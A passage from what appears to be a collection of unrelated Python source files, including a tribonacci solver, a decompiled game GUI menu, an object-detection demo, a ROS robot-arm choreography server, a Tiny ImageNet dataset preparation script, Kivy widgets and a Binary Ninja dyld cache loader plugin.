c = (T[0][0] * M[0][2] + T[0][1] * M[1][2] + T[0][2] * M[2][2])
d = (T[1][0] * M[0][0] + T[1][1] * M[1][0] + T[1][2] * M[2][0])
e = (T[1][0] * M[0][1] + T[1][1] * M[1][1] + T[1][2] * M[2][1])
f = (T[1][0] * M[0][2] + T[1][1] * M[1][2] + T[1][2] * M[2][2])
g = (T[2][0] * M[0][0] + T[2][1] * M[1][0] + T[2][2] * M[2][0])
h = (T[2][0] * M[0][1] + T[2][1] * M[1][1] + T[2][2] * M[2][1])
i = (T[2][0] * M[0][2] + T[2][1] * M[1][2] + T[2][2] * M[2][2])
T[0][0] = a
T[0][1] = b
T[0][2] = c
T[1][0] = d
T[1][1] = e
T[1][2] = f
T[2][0] = g
T[2][1] = h
T[2][2] = i
def power(self, T, n):
if n == 0 or n == 1: return
self.power(T, n // 2)
self.multiply(T, T)
if n % 2: self.multiply(T, [[1, 1, 1], [1, 0, 0], [0, 1, 0]])
def tribonacci(self, n: int) -> int:
if n == 0: return 0
if n <= 2: return 1
T = [[1, 1, 1], [1, 0, 0], [0, 1, 0]]
self.power(T, n - 1)
return T[0][0]
|
python
|
# [START method_one]
# [START method_two]
def _bar():
return 'Underscores in method names denote helper methods.'
# [END method_one]
# [END method_two]
# [START method_one]
def return_one():
return 1
# [END method_one]
# [START method_two]
def return_two():
return 2
# [END method_two]
|
python
|
class Song:
"""Class to represent a song
Attributes:
title (str): The title of the song
artist (Artist): An artist object representing the songs creator.
duration (int): The duration of the song in seconds. May be zero
"""
def __init__(self, title, artist, duration=0):
self.title = title
self.artist = artist
self.duration = duration
class Album:
"""Class to represent an Album, using it's track list
Attributes:
album_name (str): The name of the album.
year (int): The year was album was released.
artist: (Artist): The artist responsible for the album. If not specified,
the artist will default to an artist with the name "Various Artists".
tracks (List[Song]): A list of the songs on the album.
Methods:
add_song: Used to add a new song to the album's track list.
"""
def __init__(self, name, year, artist=None):
self.name = name
self.year = year
if artist is None:
self.artist = Artist("Various Artists")
else:
self.artist = artist
self.tracks = []
def add_song(self, song, position=None):
"""Adds a song to the track list
Args:
song (Song): A song to add.
position (Optional[int]): If specified, the song will be added to that position
in the track list - inserting it between other songs if necessary.
Otherwise, the song will be added to the end of the list.
"""
if position is None:
self.tracks.append(song)
else:
self.tracks.insert(position, song)
# help(Song)
# help(Song.__init__)
|
python
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.piratesgui.BarSelectionMenu
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from direct.directnotify import DirectNotifyGlobal
from otp.otpbase import OTPGlobals
from pirates.piratesgui import GuiPanel
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.reputation import ReputationGlobals
from pirates.battle import WeaponGlobals
from pirates.economy import EconomyGlobals
from pirates.economy.EconomyGlobals import *
from pirates.piratesbase import Freebooter
from pirates.inventory import ItemGlobals
class BarSelectionMenu(GuiPanel.GuiPanel):
__module__ = __name__
notify = DirectNotifyGlobal.directNotify.newCategory('BarSelectionMenu')
ICON_WIDTH = 0.13
HEIGHT = 0.15
SelectionDelay = 0.6
def __init__(self, items, command=None):
GuiPanel.GuiPanel.__init__(self, None, 1.0, self.HEIGHT, showClose=0)
self.items = items
self.icons = []
self.hotkeys = []
self.repMeters = []
self.choice = 0
self.command = command
self.hideTask = None
card = loader.loadModel('models/textureCards/selectionGui')
texCard = card.find('**/main_gui_general_box_over')
self.cursor = DirectFrame(parent=self, state=DGG.DISABLED, relief=None, frameSize=(0,
0.08,
0,
0.08), pos=(0.08,
0,
0.07), geom=texCard, geom_scale=0.12)
self.cursor.setTransparency(1)
self.cursor.resetFrameSize()
card.removeNode()
self.initialiseoptions(BarSelectionMenu)
self.card = loader.loadModel('models/gui/gui_icons_weapon')
self.accept('escape', self.__handleCancel)
self.loadWeaponButtons()
self.hide()
return
def loadWeaponButtons(self):
for hotkey in self.hotkeys:
hotkey.destroy()
self.hotkeys = []
for icon in self.icons:
icon.destroy()
self.icons = []
for repMeter in self.repMeters:
repMeter.destroy()
self.repMeters = []
self['frameSize'] = (
0, self.ICON_WIDTH * len(self.items) + 0.04, 0, self.HEIGHT)
self.setX(-((self.ICON_WIDTH * len(self.items) + 0.04) / 2.0))
topGui = loader.loadModel('models/gui/toplevel_gui')
kbButton = topGui.find('**/keyboard_button')
for i in range(len(self.items)):
if self.items[i]:
category = WeaponGlobals.getRepId(self.items[i][0])
icon = DirectFrame(parent=self, state=DGG.DISABLED, relief=None, frameSize=(0,
0.08,
0,
0.08), pos=(self.ICON_WIDTH * i + 0.08, 0, 0.082))
icon.setTransparency(1)
hotkeyText = 'F%s' % self.items[i][1]
hotkey = DirectFrame(parent=icon, state=DGG.DISABLED, relief=None, text=hotkeyText, text_align=TextNode.ACenter, text_scale=0.045, text_pos=(0,
0), text_fg=PiratesGuiGlobals.TextFG2, text_shadow=PiratesGuiGlobals.TextShadow, image=kbButton, image_scale=0.06, image_pos=(0,
0,
0.01), image_color=(0.5,
0.5,
0.35,
1), pos=(0,
0,
0.08))
self.hotkeys.append(hotkey)
category = WeaponGlobals.getRepId(self.items[i][0])
if Freebooter.getPaidStatus(base.localAvatar.getDoId()) or Freebooter.allowedFreebooterWeapon(category):
asset = ItemGlobals.getIcon(self.items[i][0])
if asset:
texCard = self.card.find('**/%s' % asset)
icon['geom'] = texCard
icon['geom_scale'] = 0.08
icon.resetFrameSize()
self.icons.append(icon)
else:
texCard = topGui.find('**/pir_t_gui_gen_key_subscriber*')
icon['geom'] = texCard
icon['geom_scale'] = 0.2
icon.resetFrameSize()
self.icons.append(icon)
repMeter = DirectWaitBar(parent=icon, relief=DGG.SUNKEN, state=DGG.DISABLED, borderWidth=(0.002,
0.002), range=0, value=0, frameColor=(0.24,
0.24,
0.21,
1), barColor=(0.8,
0.8,
0.7,
1), pos=(-0.05, 0, -0.0525), hpr=(0,
0,
0), frameSize=(0.005,
0.095,
0,
0.0125))
self.repMeters.append(repMeter)
inv = base.localAvatar.getInventory()
if inv:
repValue = inv.getReputation(category)
level, leftoverValue = ReputationGlobals.getLevelFromTotalReputation(category, repValue)
max = ReputationGlobals.getReputationNeededToLevel(category, level)
repMeter['range'] = max
repMeter['value'] = leftoverValue
return
def selectPrev(self):
if len(self.items) < 1:
return
self.show()
if len(self.items) > 1:
keepTrying = True
else:
keepTrying = False
while keepTrying:
keepTrying = False
self.choice = self.choice - 1
if self.choice < 0 or self.choice > len(self.items) - 1:
self.choice = len(self.items) - 1
if not Freebooter.getPaidStatus(base.localAvatar.getDoId()):
if self.items[self.choice]:
category = WeaponGlobals.getRepId(self.items[self.choice][0])
if not Freebooter.allowedFreebooterWeapon(category):
keepTrying = True
else:
keepTrying = True
self.cursor.setPos(self.ICON_WIDTH * self.choice + 0.08, 0, 0.072)
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.hideTask = taskMgr.doMethodLater(self.SelectionDelay, self.confirmSelection, 'BarSelectHideTask' + str(self.getParent()), extraArgs=[])
def selectNext(self):
if len(self.items) < 1:
return
self.show()
if len(self.items) > 1:
keepTrying = True
else:
keepTrying = False
while keepTrying:
keepTrying = False
self.choice = self.choice + 1
if self.choice > len(self.items) - 1:
self.choice = 0
if not Freebooter.getPaidStatus(base.localAvatar.getDoId()):
category = WeaponGlobals.getRepId(self.items[self.choice][0])
if not Freebooter.allowedFreebooterWeapon(category):
keepTrying = True
self.cursor.setPos(self.ICON_WIDTH * self.choice + 0.08, 0, 0.072)
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.hideTask = taskMgr.doMethodLater(self.SelectionDelay, self.confirmSelection, 'BarSelectHideTask' + str(self.getParent()), extraArgs=[])
def selectChoice(self, weaponId):
if len(self.items) < 1:
return
if weaponId not in self.items:
return
self.show()
self.choice = self.items.index(weaponId)
self.cursor.setPos(self.ICON_WIDTH * self.choice + 0.08, 0, 0.072)
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.hideTask = taskMgr.doMethodLater(self.SelectionDelay * 2, self.hide, 'BarSelectHideTask' + str(self.getParent()), extraArgs=[])
def confirmSelection(self):
self.hide()
if self.command and self.choice < len(self.items):
self.command(self.items[self.choice][0], self.items[self.choice][1], fromWheel=1)
def update(self, items):
if self.items != items:
self.items = items
self.loadWeaponButtons()
def updateRep(self, category, value):
for i in range(len(self.items)):
repId = WeaponGlobals.getRepId(self.items[i][0])
if repId == category:
level, leftoverValue = ReputationGlobals.getLevelFromTotalReputation(category, value)
max = ReputationGlobals.getReputationNeededToLevel(category, level)
if len(self.repMeters) - 1 >= i:
self.repMeters[i]['range'] = max
self.repMeters[i]['value'] = leftoverValue
def destroy(self):
if hasattr(self, 'destroyed'):
return
self.destroyed = 1
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.ignore('escape')
for icon in self.icons:
icon.destroy()
icon = None
self.icons = []
if self.card:
self.card.removeNode()
self.card = None
GuiPanel.GuiPanel.destroy(self)
return
def __handleCancel(self):
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.hide()
for item in self.items:
if item:
index = localAvatar.currentWeaponId == item[0] and self.items.index(item)
self.choice = index
return
def hide(self):
if hasattr(base, 'localAvatar'):
if hasattr(localAvatar.guiMgr.combatTray, 'skillTray'):
localAvatar.guiMgr.combatTray.skillTray.show()
GuiPanel.GuiPanel.hide(self)
|
python
|
import argparse
from paz.pipelines import SSD300FAT, SSD300VOC, SSD512COCO, SSD512YCBVideo
from paz.backend.camera import VideoPlayer, Camera
import tensorflow as tf
gpus = tf.config.experimental.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(gpus[0], True)
parser = argparse.ArgumentParser(description='SSD object detection demo')
parser.add_argument('-c', '--camera_id', type=int, default=0,
help='Camera device ID')
parser.add_argument('-s', '--score_thresh', type=float, default=0.6,
help='Box/class score threshold')
parser.add_argument('-n', '--nms_thresh', type=float, default=0.45,
help='non-maximum suppression threshold')
parser.add_argument('-d', '--dataset', type=str, default='VOC',
choices=['VOC', 'COCO', 'YCBVideo', 'FAT'],
help='Dataset name')
args = parser.parse_args()
name_to_model = {'VOC': SSD300VOC,
'FAT': SSD300FAT,
'COCO': SSD512COCO,
'YCBVideo': SSD512YCBVideo}
pipeline = name_to_model[args.dataset]
detect = pipeline(args.score_thresh, args.nms_thresh)
camera = Camera(args.camera_id)
player = VideoPlayer((1280, 960), detect, camera)
player.run()
|
python
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, SRI International
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of SRI International nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Acorn Pooley, Mike Lautman
# 7/11/18: Updated for use by Robust Autonomy and Decisions Group by Samantha Kim
# Action code based on ROS wiki tutorial "Writing a Simple Action Server using the
# Execute Callback (Python)".
import sys
import copy
import rospy
import tf
import actionlib
import object_experiments.msg
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
class MoveGroupPythonInterface(object):
def __init__(self):
super(MoveGroupPythonInterface, self).__init__()
## Initialize `moveit_commander`_ and a `rospy`_ node:
moveit_commander.roscpp_initialize(sys.argv)
## Instantiate a `RobotCommander`_ object. This object is the outer-level interface to
## the robot:
robot = moveit_commander.RobotCommander()
## Instantiate a `PlanningSceneInterface`_ object. This object is an interface
## to the world surrounding the robot:
scene = moveit_commander.PlanningSceneInterface()
## Instantiate a `MoveGroupCommander`_ object. This object is an interface
## to one group of joints. In this case the group is the joints in the Panda
## arm so we set ``group_name = panda_arm``. If you are using a different robot,
## you should change this value to the name of your robot arm planning group.
## This interface can be used to plan and execute motions on the Panda:
group_name = "manipulator"
group = moveit_commander.MoveGroupCommander(group_name)
# Initialize velocity and acceleration scaling factors to prevent
# overly fast movements. Can be changed later using the go_to_pose_goal
# and go_to_joint_state functions.
group.set_max_acceleration_scaling_factor(0.1)
group.set_max_velocity_scaling_factor(0.1)
## Create a `DisplayTrajectory`_ publisher which may be used to publish
## trajectories for RViz to visualize:
display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',
moveit_msgs.msg.DisplayTrajectory,
queue_size=20)
# Print name of the reference frame for this robot:
planning_frame = group.get_planning_frame()
print "============ Reference frame: %s" % planning_frame
# Print the name of the end-effector link for this group:
eef_link = group.get_end_effector_link()
print "============ End effector: %s" % eef_link
# List of all the groups in the robot:
group_names = robot.get_group_names()
print "============ Robot Groups:", robot.get_group_names()
# Print the state of the robot:
print "============ Printing robot state"
print robot.get_current_state()
print ""
# Misc variables
self.box_name = ''
self.robot = robot
self.scene = scene
self.group = group
self.display_trajectory_publisher = display_trajectory_publisher
self.planning_frame = planning_frame
self.eef_link = eef_link
self.group_names = group_names
def knock_blocks(self):
"""
Function: knock_blocks
----------------------------------
UR10 will go to a pre-collision pose, bend at the elbow joint,
colliding with the block setup, and return to a neutral pose.
Poses were found using the teaching pendant.
"""
# Init pose
init_pose = geometry_msgs.msg.Pose()
init_pose.position.x = -0.488798937651
init_pose.position.y = 0.104866858129
init_pose.position.z = -1.0074033753
init_pose.orientation.x = 0.495021656851
init_pose.orientation.y = 0.516180354965
init_pose.orientation.z = -0.48224425657
init_pose.orientation.w = 0.505916868074
# Pre-collision pose
pre_coll_pose = geometry_msgs.msg.Pose()
pre_coll_pose.position.x = -0.558980015093
pre_coll_pose.position.y = 0.290542710322
pre_coll_pose.position.z = -1.04752385597
pre_coll_pose.orientation.x = 0.485564471115
pre_coll_pose.orientation.y = 0.524631938133
pre_coll_pose.orientation.z = -0.503994513944
pre_coll_pose.orientation.w = 0.484745297859
# Post-collision pose
post_coll_pose = geometry_msgs.msg.Pose()
post_coll_pose.position.x = -0.397289172218
post_coll_pose.position.y = 0.290860833622
post_coll_pose.position.z = -1.07770150547
post_coll_pose.orientation.x = 0.485054814234
post_coll_pose.orientation.y = 0.524070568573
post_coll_pose.orientation.z = -0.504404664407
post_coll_pose.orientation.w = 0.485448275813
self.go_to_pose_goal(pre_coll_pose, .1, .1)
# Post-collision joint state
post_coll_joint_goal = self.group.get_current_joint_values()
post_coll_joint_goal[3] -= pi / 6
self.go_to_joint_state(post_coll_joint_goal, .1, .1)
self.go_to_pose_goal(init_pose, .1, .1)
def go_to_joint_state(self, joint_goal, velocity, acceleration):
"""
Function: go_to_joint_state
------------------------------------
Moves the robot to the specified joint state with the
specified velocity and acceleration. Velocity
and acceleration are values between [0,1], corresponding
to the scaling factor for the reduction of the maximum
joint velocity and acceleration.
"""
# Set velocity and acceleration scaling factors.
self.group.set_max_velocity_scaling_factor(velocity)
self.group.set_max_acceleration_scaling_factor(acceleration)
self.group.go(joint_goal, wait=True)
# Calling ``stop()`` ensures that there is no residual movement
self.group.stop()
def go_to_pose_goal(self, pose_goal, velocity, acceleration):
"""
Function: go_to_pose_goal
------------------------------------
Plans a pose goal and executes the path. This method is preferable
to cartesian path planning and execution because velocity and
acceleration limitations can be set.
"""
# Set velocity and acceleration scaling factors.
self.group.set_max_velocity_scaling_factor(velocity)
self.group.set_max_acceleration_scaling_factor(acceleration)
# Add pose goals and execute path
self.group.set_pose_target(pose_goal)
plan = self.group.go(wait=True)
# Calling `stop()` ensures that there is no residual movement
self.group.stop()
# It is always good to clear your targets after planning with poses.
# Note: there is no equivalent function for clear_joint_value_targets()
self.group.clear_pose_targets()
def get_formatted_current_pose(self, pose_name):
"""
Function: get_formatted_current_pose
------------------------------------
Prints to screen the current pose of the robot in a format that allows
for easy hardcoding of a particular pose.
"""
current_pose = self.group.get_current_pose()
print pose_name + " = geometry_msgs.msg.Pose()"
print pose_name + ".position.x = " + str(current_pose.pose.position.x)
print pose_name + ".position.y = " + str(current_pose.pose.position.y)
print pose_name + ".position.z = " + str(current_pose.pose.position.z)
print pose_name + ".orientation.x = " + str(current_pose.pose.orientation.x)
print pose_name + ".orientation.y = " + str(current_pose.pose.orientation.y)
print pose_name + ".orientation.z = " + str(current_pose.pose.orientation.z)
print pose_name + ".orientation.w = " + str(current_pose.pose.orientation.w)
class Choreography(object):
"""
Set up an Action Server that expects ChoreographyAction messages.
When a ChoreographyAction goal is received, it executes the type of
choreography specified by the message.
"""
feedback = object_experiments.msg.ChoreographyFeedback()
result = object_experiments.msg.ChoreographyResult()
success = True
def __init__(self, name):
self.action_name = name
self.server = actionlib.SimpleActionServer(self.action_name,
object_experiments.msg.ChoreographyAction,
self.execute,
auto_start = False)
self.server.start()
print("ActionServer initialized.")
def execute(self,goal):
self.success = True
rospy.loginfo('Starting choreography: %s' % (goal))
execute_choreography(goal)
if self.success:
rospy.loginfo('%s: Succeeded' % self.action_name)
self.server.set_succeeded(self.result)
def check_preempt(self):
if self.server.is_preempt_requested():
rospy.loginfo('%s: Preemepted' % self.action_name)
self.server.set_preempted()
self.success = False
return False
return True
def execute_choreography(goal):
"""
Function: execute_choreography
------------------------------------
Executes the choreography specified as a goal.
Additional choreography options should be included here
as if/elif cases.
"""
try:
# Initialize MoveIt commander
robot_commander = MoveGroupPythonInterface()
# Execute choreography
print("Executing: " + goal.choreography.data)
if goal.choreography.data == "knock_blocks":
robot_commander.knock_blocks()
elif goal.choreography.data == "get_formatted_current_pose":
robot_commander.get_formatted_current_pose("your_pose_name")
print "============ Choreography complete!"
except rospy.ROSInterruptException:
return
except KeyboardInterrupt:
return
if __name__ == '__main__':
rospy.init_node('choreography')
server = Choreography(rospy.get_name())
rospy.spin()
|
python
|
import os
import urllib.request
import zipfile
from random import shuffle
from math import floor
def download_dataset():
print('Beginning dataset download with urllib2')
url = "http://cs231n.stanford.edu/tiny-imagenet-200.zip"
path = "%s/tiny-imagenet-200.zip" % os.getcwd()
urllib.request.urlretrieve(url, path)
print("Dataset downloaded")
def unzip_data():
path_to_zip_file = "%s/tiny-imagenet-200.zip" % os.getcwd()
directory_to_extract_to = os.getcwd()
print("Extracting zip file: %s" % path_to_zip_file)
with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
zip_ref.extractall(directory_to_extract_to)
print("Extracted at: %s" % directory_to_extract_to)
def format_val():
val_dir = "%s/tiny-imagenet-200/val" % os.getcwd()
print("Formatting: %s" % val_dir)
val_annotations = "%s/val_annotations.txt" % val_dir
val_dict = {}
with open(val_annotations, 'r') as f:
for line in f:
line = line.strip().split()
assert(len(line) == 6)
wnind = line[1]
img_name = line[0]
boxes = '\t'.join(line[2:])
if wnind not in val_dict:
val_dict[wnind] = []
entries = val_dict[wnind]
entries.append((img_name, boxes))
assert(len(val_dict) == 200)
for wnind, entries in val_dict.items():
val_wnind_dir = "%s/%s" % (val_dir, wnind)
val_images_dir = "%s/images" % val_dir
val_wnind_images_dir = "%s/images" % val_wnind_dir
os.mkdir(val_wnind_dir)
os.mkdir(val_wnind_images_dir)
wnind_boxes = "%s/%s_boxes.txt" % (val_wnind_dir, wnind)
f = open(wnind_boxes, "w")
for img_name, box in entries:
source = "%s/%s" % (val_images_dir, img_name)
dst = "%s/%s" % (val_wnind_images_dir, img_name)
os.system("cp %s %s" % (source, dst))
f.write("%s\t%s\n" % (img_name, box))
f.close()
os.system("rm -rf %s" % val_images_dir)
print("Cleaning up: %s" % val_images_dir)
print("Formatting val done")
def split_train_test():
split_quota = 0.7
print("Splitting Train+Val into %s-%s" % (split_quota*100, (1 - split_quota)*100))
base_dir = "%s/tiny-imagenet-200" % os.getcwd()
train_dir = "%s/train" % base_dir
val_dir = "%s/val" % base_dir
fwnind = "%s/wnids.txt" % base_dir
wninds = set()
with open(fwnind, "r") as f:
for wnind in f:
wninds.add(wnind.strip())
assert(len(wninds) == 200)
new_train_dir = "%s/new_train" % base_dir
new_test_dir = "%s/new_test" % base_dir
os.mkdir(new_train_dir)
os.mkdir(new_test_dir)
total_ntrain = 0
total_ntest = 0
for wnind in wninds:
wnind_ntrain = 0
wnind_ntest = 0
new_train_wnind_dir = "%s/%s" % (new_train_dir, wnind)
new_test_wnind_dir = "%s/%s" % (new_test_dir, wnind)
os.mkdir(new_train_wnind_dir)
os.mkdir(new_test_wnind_dir)
os.mkdir(new_train_wnind_dir+"/images")
os.mkdir(new_test_wnind_dir+"/images")
new_train_wnind_boxes = "%s/%s_boxes.txt" % (new_train_wnind_dir, wnind)
f_ntrain = open(new_train_wnind_boxes, "w")
new_test_wnind_boxes = "%s/%s_boxes.txt" % (new_test_wnind_dir, wnind)
f_ntest = open(new_test_wnind_boxes, "w")
dirs = [train_dir, val_dir]
for wdir in dirs:
wnind_dir = "%s/%s" % (wdir, wnind)
wnind_boxes = "%s/%s_boxes.txt" % (wnind_dir, wnind)
imgs = []
with open(wnind_boxes, "r") as f:
for line in f:
line = line.strip().split()
img_name = line[0]
boxes = '\t'.join(line[1:])
imgs.append((img_name, boxes))
print("[Old] wind: %s - #: %s" % (wnind, len(imgs)))
shuffle(imgs)
split_n = floor(len(imgs)*0.7)
train_imgs = imgs[:split_n]
test_imgs = imgs[split_n:]
for img_name, box in train_imgs:
source = "%s/images/%s" % (wnind_dir, img_name)
dst = "%s/images/%s" % (new_train_wnind_dir, img_name)
os.system("cp %s %s" % (source, dst))
f_ntrain.write("%s\t%s\n" % (img_name, box))
wnind_ntrain += 1
for img_name, box in test_imgs:
source = "%s/images/%s" % (wnind_dir, img_name)
dst = "%s/images/%s" % (new_test_wnind_dir, img_name)
os.system("cp %s %s" % (source, dst))
f_ntest.write("%s\t%s\n" % (img_name, box))
wnind_ntest += 1
f_ntrain.close()
f_ntest.close()
print("[New] wnind: %s - #train: %s - #test: %s" % (wnind, wnind_ntrain,
wnind_ntest))
total_ntrain += wnind_ntrain
total_ntest += wnind_ntest
print("[New] #train: %s - #test: %s" % (total_ntrain, total_ntest))
os.system("rm -rf %s" % train_dir)
os.system("rm -rf %s" % val_dir)
print("Cleaning up: %s" % train_dir)
print("Cleaning up: %s" % val_dir)
print("Created new train data at: %s" % new_train_dir)
print("Cleaning new test data at: %s" % new_test_dir)
print("Splitting dataset done")
def main():
# download_dataset()
unzip_data()
format_val()
# split_train_test()
if __name__ == '__main__':
main()
|
python
|
from behaviors.button import ButtonBehavior, ToggleButtonBehavior
from behaviors.touch_effecs import EffectBehavior
from kivy.uix.image import Image
from kivy.uix.anchorlayout import AnchorLayout
from kivy.properties import (
ListProperty, ObjectProperty,
)
from kivy.graphics import Color, Rectangle
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.clock import Clock
Builder.load_string('''
<KVAnchorIcon>:
size_hint_x:None
width:'70dp'
anchor_x:'center'
anchor_y:'center'
<KVButtonIcon>:
icon_color:[1, 1, 1, 1]
size_hint:None, None
size:'40dp', '40dp'
mipmap:True
allow_strech:True
keep_ratio:False
canvas:
Clear
canvas.before:
Clear
Color:
rgba:self.icon_color
Rectangle:
texture:self.texture
pos:self.pos
size:self.size
<KVToggleButtonIcon>:
size:'30dp', '30dp'
''', filename="KVIcon.kv")
class KVAnchorIcon(AnchorLayout):
background_color = ListProperty([0, 0, 0, 0])
back = ObjectProperty(None)
def on_background_color(self, *args):
self.unbind(size=self.update_background)
self.unbind(pos=self.update_background)
self.bind(size=self.update_background)
self.bind(pos=self.update_background)
with self.canvas.before:
Color(rgba=self.background_color)
self.back = Rectangle(size=self.size, pos=self.pos)
def update_background(self, *args):
self.back.size = self.size
self.back.pos = self.pos
class KVButtonIcon(EffectBehavior, ButtonBehavior, Image):
effect_color = ListProperty([0, 0, 0, 0])
defaut_color = ListProperty([1, 1, 1, 1])
pos_color = ListProperty([0, 0, 0, 0])
pos_sources = ListProperty([])
state_sources = ListProperty([])
enter_pos = False
def __init__(self, **kwargs):
self.register_event_type('on_mouse_inside')
self.register_event_type('on_mouse_outside')
self.bind(
pos_sources=self.config,
state_sources=self.config,
defaut_color=self.config,
)
super(KVButtonIcon, self).__init__(**kwargs)
self.type_button = 'Rounded'
Window.bind(mouse_pos=self.on_mouse_pos)
Clock.schedule_once(self.config)
def config(self, *args):
if len(self.pos_sources) == 2:
self.source = self.pos_sources[0]
if len(self.state_sources) == 2:
self.source = self.state_sources[0]
if self.defaut_color != [1, 1, 1, 1]:
self.icon_color = self.defaut_color
def on_state(self, widget, state):
if len(self.state_sources) == 2:
if state == 'normal':
self.source = self.state_sources[0]
elif state == 'down':
self.source = self.state_sources[1]
def on_mouse_pos(self, window, mouse_pos):
if self.collide_point(*self.to_widget(*mouse_pos)):
self.enter_pos = True
self.dispatch('on_mouse_inside')
if len(self.pos_sources) == 2:
self.source = self.pos_sources[1]
if self.pos_color != [0, 0, 0, 0]:
self.icon_color = self.pos_color
return None
if len(self.pos_sources) == 2:
self.source = self.pos_sources[0]
if self.defaut_color != [1, 1, 1, 1]:
self.icon_color = self.defaut_color
if self.enter_pos:
self.enter_pos = False
self.dispatch('on_mouse_outside')
def on_touch_down(self, touch):
if touch.is_mouse_scrolling:
return False
elif self in touch.ud:
return False
if self.collide_point(*touch.pos):
touch.grab(self)
self.ripple_show(touch)
return super(KVButtonIcon, self).on_touch_down(touch)
return False
def on_touch_up(self, touch):
if touch.grab_current is self:
touch.ungrab(self)
self.ripple_fade()
return super(KVButtonIcon, self).on_touch_up(touch)
def on_mouse_inside(self):
pass
def on_mouse_outside(self):
pass
class KVToggleButtonIcon(ToggleButtonBehavior, KVButtonIcon):
pass
|
python
|
import os
from sys import argv
tobs = int(argv[1])
for i in range(6):
if i != 4:
for j in range(10):
if j==0:
os.system('tail -10000 tobs%d/window%d/hb_list_tobs_%d_task_%d.dat > tobs%d/window%d/window%d.dat'%(tobs,i,tobs,j,tobs,i,i))
else:
os.system('tail -10000 tobs%d/window%d/hb_list_tobs_%d_task_%d.dat >> tobs%d/window%d/window%d.dat'%(tobs,i,tobs,j,tobs,i,i))
|
python
|
from binaryninja import *
from binaryninja.binaryview import BinaryView
from binaryninja.platform import Platform
from .browser import ImagePickerDialog
# binja doesn't want to load mods in a plugin's dir
# so hopefully we can just hack that in manually
# We do this after importing binaryninja, because in my local workspace I embed a copy of
# the binaryninja API so my IDE can handle intellisense
# This wont interfere since binja wont see that dir properly
this_script = os.path.realpath(__file__)
this_dir = os.path.dirname(this_script)
sys.path.insert(0, this_dir)
sys.path.insert(0, this_dir + os.path.sep + 'ktool')
from io import BytesIO
from DyldExtractor.extraction_context import ExtractionContext
from DyldExtractor.macho.macho_context import MachOContext
from DyldExtractor.dyld.dyld_context import DyldContext
from DyldExtractor.converter import (
slide_info,
macho_offset,
linkedit_optimizer,
stub_fixer,
objc_fixer
)
import ktool
def internal_print_rewrite(msg):
log.log(LogLevel.InfoLog, msg)
print = internal_print_rewrite
class DyldCacheHander:
def __init__(self, filename):
self.filename = filename
self.images = []
self.image_map = {}
self.fp = open(filename, 'rb')
self.dyld_context = None
def populate_image_list(self):
self.dyld_context = DyldContext(self.fp)
for imageData in self.dyld_context.images:
path = self.dyld_context.readString(imageData.pathFileOffset)
path = path[0:-1] # remove null terminator
path = path.decode("utf-8")
self.images.append(path)
self.image_map[path] = imageData
# noinspection PyAbstractClass
class DyldSharedCacheView(BinaryView):
name = "DyldSharedCache"
long_name = "Dyld Shared Cache Loader"
def __init__(self, data):
BinaryView.__init__(self, parent_view=data, file_metadata=data.file)
self.cache_handler = DyldCacheHander(data.file.filename)
def init(self):
# TODO: not hardcode
self.platform = Platform[f"mac-aarch64"]
self.cache_handler.populate_image_list()
# Use the fancy image picker if the UI is enabled
if core_ui_enabled():
ipd = ImagePickerDialog(self.cache_handler.images)
ipd.run()
# Can happen if the dialog is rejected
if ipd.chosen_image is None:
return False
image = self.cache_handler.image_map[ipd.chosen_image]
else:
mod_index = get_choice_input(f'Found {len(self.cache_handler.images)} Images', f'Select Image',
self.cache_handler.images)
mod = self.cache_handler.images[mod_index]
image = self.cache_handler.image_map[mod]
_macho_offset, context = self.cache_handler.dyld_context.convertAddr(image.address)
macho_ctx = MachOContext(context.fileObject, _macho_offset, True)
extraction_ctx = ExtractionContext(self.cache_handler.dyld_context, macho_ctx)
slide_info.processSlideInfo(extraction_ctx)
linkedit_optimizer.optimizeLinkedit(extraction_ctx)
stub_fixer.fixStubs(extraction_ctx)
objc_fixer.fixObjC(extraction_ctx)
